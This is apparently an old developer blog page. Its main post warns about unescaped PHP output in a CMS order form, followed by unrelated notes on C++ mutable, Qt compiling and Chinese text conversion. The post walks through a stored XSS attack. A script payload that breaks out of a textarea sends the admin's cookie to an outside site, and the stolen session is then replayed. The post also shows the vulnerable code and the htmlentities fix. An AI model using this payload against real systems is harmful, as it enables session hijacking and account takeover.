I've told my teammates 1000 times everything must be escaped, but i still found this terrible php code in their projects. This is un-professional.. sigh...
<input id="name" name="name" value="<?php echo htmlspecialchars($row["name"]) ?> />
<textarea id="address" name="address">
<?php echo $row["address"]?>
</textarea>
Above code is a order form in web CMS backend. $row is read from database , contain name field and address field, they will show the values that frontend entered. It can modify each order info by CMS backend.
Here the note that how to hack into the CMS backend without password.
0. Go to Frontend and enter my info
1. First i enter my name field, let enter my site "http://www.webmoss.net/?".
2. Second i enter my address field, enter "</textarea><script>location.href=document.all.name.value+document.cookie</script>"
3. If some admin login to CMS backend and view my info, his cookie data will send to my site directly, including session id or PHPSESSION. Then I check my www.webmoss.net access log, got the session id and referer link.
4. Install this cookie editor, https://addons.mozilla.org/en-US/firefox/addon/573
copy the session id to cookie editor. Go to the referer link which found in www.webmoss.net access log.
5. Yo, I saw my info in backend. This is terrible.
To fix this hole, just simply use htmlentities like this
<?=htmlentities($row["des"],ENT_QUOTES,"UTF-8")?>
I don't want next 1001 time.
NOT only textarea use htmlentities, every data also have to use htmlentities
here the code
"</body><script>location.href=document.all.name.value+document.cookie</script>"
God Bless
Wednesday, October 15, 2008
Tuesday, October 14, 2008
C++'s mutable and conceptual constness
Nice OO Example , suggest everyone should read this, although you're not C++ programmer
http://www.highprogrammer.com/alan/rants/mutable.html
http://www.highprogrammer.com/alan/rants/mutable.html
Saturday, October 4, 2008
Qt 4.4.3 Windows Compiling Notes
Key feature Spec:
OpenSSL FIX Note:
Moving the typdef from the ossl_typ.h file to the ocsp.h file where the stuct ocsp_response_st is defined at.
Env. :
@echo off
Set QMAKESPEC=win32-msvc2008
Set QTDIR=C:\qt\4.4.3
Set C:\qt\4.4.3\bin;%PATH%
Call C:\Program Files\Microsoft DirectX SDK (August 2008)\Utilities\Bin\dx_setenv.cmd
Call C:\Program Files\Microsoft Visual Studio 9.0\VC\vcvarsall.bat
Set OPENSSL_DIR = "c:\openssl"
- Phonon supported
- OpenSSL supported
OpenSSL FIX Note:
Moving the typdef from the ossl_typ.h file to the ocsp.h file where the stuct ocsp_response_st is defined at.
Env. :
@echo off
Set QMAKESPEC=win32-msvc2008
Set QTDIR=C:\qt\4.4.3
Set C:\qt\4.4.3\bin;%PATH%
Call C:\Program Files\Microsoft DirectX SDK (August 2008)\Utilities\Bin\dx_setenv.cmd
Call C:\Program Files\Microsoft Visual Studio 9.0\VC\vcvarsall.bat
Set OPENSSL_DIR = "c:\openssl"
Sunday, October 21, 2007
简/繁 轉換转换 Convert Chinese Traditional / Simplified using PHP
PHP, mbstring is required
all in UTF-8 encoding
//mb_string is required
str_chinese_trad("标准字") == "標準字"
str_chinese_simp("標準字") == "标准字"
download here
all in UTF-8 encoding
//mb_string is required
str_chinese_trad("标准字") == "標準字"
str_chinese_simp("標準字") == "标准字"
download here
Monday, April 23, 2007
Subscribe to:
Posts (Atom)
